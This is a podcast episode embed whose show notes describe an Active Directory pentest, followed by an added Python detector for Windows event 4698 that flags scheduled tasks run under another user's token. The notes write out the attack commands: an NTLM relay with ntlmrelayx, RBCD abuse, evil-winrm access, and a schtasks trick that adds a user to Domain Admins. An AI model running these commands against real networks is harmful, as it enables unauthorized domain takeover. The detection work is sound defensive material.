{"version":1,"type":"rich","provider_name":"Libsyn","provider_url":"https:\/\/www.libsyn.com","height":90,"width":600,"title":"7MS #691: Tales of Pentest Pwnage \u2013 Part 75","description":"Holy schnikes, today might be my favorite tale of pentest pwnage ever. Do I say that almost every episode? Yes. Do I mean it? Yes. Here are all the commands\/links to supplement today\u2019s episode:\nGot an SA account to a SQL server through Snaffler-ing\nWith that SA account, I learned how to coerce Web auth from within a SQL shell \u2013 read more about that here\nI relayed that Web auth with ntlmrelayx -smb2support -t ldap:\/\/dc --delegate-access --escalate-user lowpriv\nI didn\u2019t have a machine account under my control, so I did SPNless RBCD on my lowpriv account \u2013 read more about that here\nUsing that technique, I requested a host service ticket for the SQL box, then used evil-winrm to remote in using the ticket\nFrom there I checked out who had interactive logons: Get-Process -IncludeUserName explorer | Select-Object UserName\nThen I queued up a fake task to elevate me to DA: schtasks \/create \/tn \"TotallyFineTask\" \/tr 'net group \"Domain Admins\" lowpriv \/add \/domain' \/sc once \/st 12:00 \/ru \"DOMAIN\\a-domain-admin\" \/it \/f \u2026and ran it: schtasks \/run \/tn \"TotallyFineTask\"","author_name":"7 Minute Security","author_url":"https:\/\/7MinSec.com","html":"<iframe title=\"Libsyn Player\" style=\"border: none\" src=\"\/\/html5-player.libsyn.com\/embed\/episode\/id\/38086380\/height\/90\/theme\/custom\/thumbnail\/yes\/direction\/forward\/render-playlist\/no\/custom-color\/88AA3C\/\" height=\"90\" width=\"600\" scrolling=\"no\"  allowfullscreen webkitallowfullscreen mozallowfullscreen oallowfullscreen msallowfullscreen><\/iframe>","thumbnail_url":"https:\/\/assets.libsyn.com\/secure\/item\/38086380"}
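The final step in the show notes above (schtasks /create ... /ru another user /it, then /run) is the one a blue team can catch cheaply: Windows records every task creation as Security event 4698, and the event carries the full task XML, including the Principal's UserId and LogonType (the /it switch becomes LogonType InteractiveToken) and the Exec action. The detection below is an added example written for this page, not code from the 7MS episode or its show notes. It parses that XML and flags tasks whose InteractiveToken principal is not the account that created them, raising severity when the action changes group membership. The event dicts are constructed samples shaped after the 4698 fields (SubjectDomainName, SubjectUserName, TaskName, TaskContent); the creating account "Administrator", the task names, the benign tasks and the severity labels are assumptions.

```python
"""Flag scheduled tasks created to run under another user's interactive
token, from Windows Security event 4698 ("A scheduled task was created").

Added example for the 7MS #691 show notes; the sample events below are
constructed by hand to mirror 4698 fields and are not real log data.
"""
import re
import xml.etree.ElementTree as ET
from typing import List, Optional

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Group-membership changes: "net group ... /add" or "net localgroup ... /add".
GROUP_ADD = re.compile(r"\bnet1?\s+(?:local)?group\b.*\s/add\b", re.IGNORECASE)

# Constructed sample events (assumption: the attacker's evil-winrm session
# ran as "Administrator" when it created the task; adjust to your data).
SAMPLE_EVENTS = [
    {   # benign: an admin scheduling something under their own token
        "SubjectDomainName": "DOMAIN", "SubjectUserName": "a-domain-admin",
        "TaskName": r"\Ops\NightlySync",
        "TaskContent": r"""<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Principals><Principal id="Author">
    <UserId>DOMAIN\a-domain-admin</UserId><LogonType>InteractiveToken</LogonType>
  </Principal></Principals>
  <Actions Context="Author"><Exec>
    <Command>robocopy.exe</Command><Arguments>D:\data \\fs\backup /MIR</Arguments>
  </Exec></Actions>
</Task>""",
    },
    {   # benign: SYSTEM task, no LogonType element at all
        "SubjectDomainName": "SQLBOX", "SubjectUserName": "Administrator",
        "TaskName": r"\Microsoft\Windows\Defrag\ScheduledDefrag",
        "TaskContent": r"""<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Principals><Principal id="Author">
    <UserId>S-1-5-18</UserId><RunLevel>HighestAvailable</RunLevel>
  </Principal></Principals>
  <Actions Context="Author"><Exec><Command>%windir%\system32\defrag.exe</Command>
    <Arguments>-c -h -o</Arguments></Exec></Actions>
</Task>""",
    },
    {   # the episode's trick: created by one account, runs as a logged-on DA
        "SubjectDomainName": "DOMAIN", "SubjectUserName": "Administrator",
        "TaskName": r"\TotallyFineTask",
        "TaskContent": r"""<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Principals><Principal id="Author">
    <UserId>DOMAIN\a-domain-admin</UserId><LogonType>InteractiveToken</LogonType>
  </Principal></Principals>
  <Actions Context="Author"><Exec><Command>net</Command>
    <Arguments>group &quot;Domain Admins&quot; lowpriv /add /domain</Arguments>
  </Exec></Actions>
</Task>""",
    },
]


def parse_task_content(task_xml: str) -> dict:
    """Extract principal and Exec command lines from Task Scheduler XML."""
    # 4698 stores the XML with a UTF-16 declaration; drop it before parsing str.
    task_xml = re.sub(r"^\s*<\?xml[^>]*\?>", "", task_xml)
    root = ET.fromstring(task_xml)
    principal = root.find("t:Principals/t:Principal", NS)
    user_id = logon_type = ""
    if principal is not None:
        user_id = principal.findtext("t:UserId", default="", namespaces=NS)
        logon_type = principal.findtext("t:LogonType", default="", namespaces=NS)
    cmdlines = []
    for exe in root.findall("t:Actions/t:Exec", NS):
        cmd = exe.findtext("t:Command", default="", namespaces=NS)
        args = exe.findtext("t:Arguments", default="", namespaces=NS)
        cmdlines.append((cmd + " " + args).strip())
    return {"user_id": user_id, "logon_type": logon_type, "cmdlines": cmdlines}


def analyze_4698(event: dict) -> Optional[dict]:
    """Return an alert for a cross-user InteractiveToken task, else None."""
    task = parse_task_content(event["TaskContent"])
    creator = f'{event["SubjectDomainName"]}\\{event["SubjectUserName"]}'.lower()
    run_as = task["user_id"].lower()  # may be a SID in real data: resolve first
    if task["logon_type"].lower() != "interactivetoken" or run_as == creator:
        return None
    reasons = ["task runs under another user's interactive token"]
    if any(GROUP_ADD.search(c) for c in task["cmdlines"]):
        reasons.append("action modifies group membership")
    return {"task": event["TaskName"], "created_by": creator, "runs_as": run_as,
            "cmdlines": task["cmdlines"], "reasons": reasons,
            "severity": "high" if len(reasons) > 1 else "medium"}


def analyze_all(events: List[dict]) -> List[dict]:
    """Run the check over a batch of 4698 events."""
    return [a for a in (analyze_4698(e) for e in events) if a]


if __name__ == "__main__":
    for alert in analyze_all(SAMPLE_EVENTS):
        print(alert)
```

Only the third sample fires, as high severity: the subject that created the task is not the principal it runs as, the logon type is InteractiveToken, and the action is a "net group ... /add". In production, resolve SID-form UserId values to names before comparing, and pair this with event 4702 (task updated), since an attacker can create a harmless task and swap the action in afterwards.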